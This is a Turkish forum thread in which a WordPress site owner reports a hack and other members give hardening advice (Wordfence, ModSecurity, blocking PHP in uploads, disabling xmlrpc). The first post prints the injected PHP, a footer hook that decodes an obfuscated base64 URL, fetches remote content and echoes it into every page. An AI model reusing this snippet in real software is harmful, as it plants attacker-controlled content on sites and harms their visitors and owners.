• 26-09-2025, 04:31:59
    #1
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Merhaba,

    Wordpress'in klasik düzenleyici eklentisinin php dosyasına eklenmişti bu kod. 5-6 siteye footer çıkıyordu bulmam 2-3 saat sürdü..

    Sitem trafik aldıkça hem olumlu sponsorluk mailleri hem ddos hemde bu tarz hacklenmelerle karşılaşıyorum. Önlem olarak ne önerirsiniz acaba? wp adminden sızılmamış, cpanelde 2fa var zaten ama wordpressin w*rez olmayan eklentisi bile olsa sızılabiliyor bunlara önlem olarak ne yapabilirim?

    add_action('wp_footer', function() {
        $url = base64_decode('aHR0cHM6Ly9tYW5hZ2VyLXVwZGF0ZS5ibG9nL2xpbmsvbGVvLmh0bWw=');
        $content = file_get_contents($url);
        if ($content !== false) {
            echo $content;
        }
    });
  • 26-09-2025, 04:42:52
    #2
    helcurt adlı üyeden alıntı: mesajı görüntüle
    Sızmışlar
    view-source:
    bu link geliyor o base64 ile
    linkin kaynak koduna bak

    Evet çözdüm hocam sorun yokta önlem olarak ne yapabilirim ilerde olmaması için?
  • 26-09-2025, 04:44:13
    #3
    Wordfence yeterli oluyor
  • 26-09-2025, 04:45:02
    #4
    helcurt adlı üyeden alıntı: mesajı görüntüle
    Wordfence yeterli oluyor
    WP zaten ağır calısıyor onu yükleyince daha da yavaşlıyor site ninja security premium aldım kurdum bakalım..
  • 26-09-2025, 04:54:52
    #5
    Üstadım her wordpress sitesinde yaptığım ayarları aşağıda ilettim, 1 yıldır aktif olarak her sitemde bunu uyguladım ve hiç sorun yaşamadım ***** eklenti olsa dahi.



    Dosya ve klasörlere erişimi sınırla
    xmlrpc.php dosyasına yetkisiz erişimi engelle
    .htaccess ve .htpasswd dosyalarına erişimi engelle
    Pingback özelliğini kapat
    WordPress yönetici panelinde dosya düzenlemeyi kapat
    Yazar taramalarını engelle
    Dizin içeriğinin listelenmesini engelle
    wp-includes klasöründe PHP çalıştırılmasını engelle
    wp-content/uploads klasöründe PHP çalıştırılmasını engelle
    Hassas dosyalara erişimi engelle
    Bot korumasını aktif et
  • 26-09-2025, 04:57:24
    #6
    Kurumsal PLUS
    Sunucu ve Cloud taraflı güvenlik yapılandırması. Wordfence vb. eklentilerin hepsi balon.
  • 26-09-2025, 07:00:04
    #7
    Arkadaşlar gerekli önerileri sağlamışlar bende şunu tavsiye etmek istiyorum: .htaccess dosyasını düzenleme izinlerini kapattıktan sonra "ModSecurity" sunucunuzda aktif hale getirin. Wordpress paneli içinden olabilecek her türlü kod eklemelerine karşı 403 hatası atacaktır.

    cPanel'de 2fa varsa ve w*rez eklentide kullanmıyorsanız 2 şekilde hacklenmiş olabileceğinizi düşünüyorum:

    1) Wordpress admin bilgisine erişilmiş veya wordpresste yetkisiz kullanıcı oluşturabilmişler.
    2) Sunucunuzda açık var; kişi aynı sunucudan shell ile erişim sağlıyor olabilir.

    Çok geçmiş olsun umarım tekrarını yaşamazsınız.